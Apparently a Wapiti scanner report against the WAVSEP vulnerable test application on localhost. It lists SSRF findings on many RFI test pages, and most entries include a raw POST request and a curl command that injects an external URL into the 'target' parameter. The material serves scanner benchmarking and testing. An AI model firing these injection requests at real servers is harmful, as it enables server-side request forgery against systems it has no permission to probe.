curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Identical/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Identical/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-302Redirect/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp

SSRF vulnerability via injection in the parameter target.
The target performed an outgoing HTTP GET request at 2018-05-29T04:05:35+02:00 with IP 174.119.60.74.
Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1893/746172676574/1527559535-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-302Redirect/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-302Redirect/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-302Redirect/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-302Redirect/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-302Redirect/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp

SSRF vulnerability via injection in the parameter target.
The target performed an outgoing HTTP GET request at 2018-05-29T04:05:36+02:00 with IP 174.119.60.74.
Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1894/746172676574/1527559536-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-302Redirect/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-302Redirect/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-302Redirect/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-302Redirect/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-302Redirect/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp

SSRF vulnerability via injection in the parameter target.
The target performed an outgoing HTTP GET request at 2018-05-29T04:05:35+02:00 with IP 174.119.60.74.
Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1897/746172676574/1527559535-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-302Redirect/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-302Redirect/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-302Redirect/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-302Redirect/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-302Redirect/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp

SSRF vulnerability via injection in the parameter target.
The target performed an outgoing HTTP GET request at 2018-05-29T04:05:35+02:00 with IP 174.119.60.74.
Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1899/746172676574/1527559535-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-302Redirect/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-302Redirect/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-302Redirect/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-302Redirect/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Identical/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp

SSRF vulnerability via injection in the parameter target.
The target performed an outgoing HTTP GET request at 2018-05-29T04:05:34+02:00 with IP 174.119.60.74.
Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1904/746172676574/1527559534-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Identical/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Identical/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Identical/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Identical/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Identical/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp

SSRF vulnerability via injection in the parameter target.
The target performed an outgoing HTTP GET request at 2018-05-29T04:05:34+02:00 with IP 174.119.60.74.
Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1905/746172676574/1527559534-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Identical/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Identical/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Identical/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Identical/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Identical/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp

SSRF vulnerability via injection in the parameter target.
The target performed an outgoing HTTP GET request at 2018-05-29T04:05:34+02:00 with IP 174.119.60.74.
Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1906/746172676574/1527559534-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Identical/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Identical/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Identical/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Identical/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Identical/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp

SSRF vulnerability via injection in the parameter target.
The target performed an outgoing HTTP GET request at 2018-05-29T04:05:34+02:00 with IP 174.119.60.74.
Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1907/746172676574/1527559534-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Identical/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Identical/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Identical/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Identical/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp

SSRF vulnerability via injection in the parameter target.
The target performed an outgoing HTTP GET request at 2018-05-29T04:05:37+02:00 with IP 174.119.60.74.
Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1910/746172676574/1527559537-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp

SSRF vulnerability via injection in the parameter target.
The target performed an outgoing HTTP GET request at 2018-05-29T04:05:37+02:00 with IP 174.119.60.74.
Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1911/746172676574/1527559537-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp

SSRF vulnerability via injection in the parameter target.
The target performed an outgoing HTTP GET request at 2018-05-29T04:05:37+02:00 with IP 174.119.60.74.
Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1913/746172676574/1527559537-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp

SSRF vulnerability via injection in the parameter target.
The target performed an outgoing HTTP GET request at 2018-05-29T04:05:37+02:00 with IP 174.119.60.74.
Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1914/746172676574/1527559537-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-404Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp

SSRF vulnerability via injection in the parameter target.
The target performed an outgoing HTTP GET request at 2018-05-29T04:05:36+02:00 with IP 174.119.60.74.
Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1919/746172676574/1527559536-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-404Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-404Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-404Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-404Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-404Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp

SSRF vulnerability via injection in the parameter target.
The target performed an outgoing HTTP GET request at 2018-05-29T04:05:36+02:00 with IP 174.119.60.74.
Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1921/746172676574/1527559536-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-404Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-404Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-404Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-404Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-404Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp

SSRF vulnerability via injection in the parameter target.
The target performed an outgoing HTTP GET request at 2018-05-29T04:05:36+02:00 with IP 174.119.60.74.
Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1922/746172676574/1527559536-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-404Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-404Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-404Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-404Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-404Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp

SSRF vulnerability via injection in the parameter target.
The target performed an outgoing HTTP GET request at 2018-05-29T04:05:36+02:00 with IP 174.119.60.74.
Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1923/746172676574/1527559536-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-404Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-404Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-404Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-404Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp

SSRF vulnerability via injection in the parameter target.
The target performed an outgoing HTTP GET request at 2018-05-29T04:05:34+02:00 with IP 174.119.60.74.
Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1927/746172676574/1527559534-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp

SSRF vulnerability via injection in the parameter target.
The target performed an outgoing HTTP GET request at 2018-05-29T04:05:34+02:00 with IP 174.119.60.74.
Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1931/746172676574/1527559534-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp

SSRF vulnerability via injection in the parameter target.
The target performed an outgoing HTTP GET request at 2018-05-29T04:05:34+02:00 with IP 174.119.60.74.
Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1933/746172676574/1527559534-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp

SSRF vulnerability via injection in the parameter target.
The target performed an outgoing HTTP GET request at 2018-05-29T04:05:33+02:00 with IP 174.119.60.74.
Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1934/746172676574/1527559533-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=http%3A%2F%2Fexternal.url%2Fpage
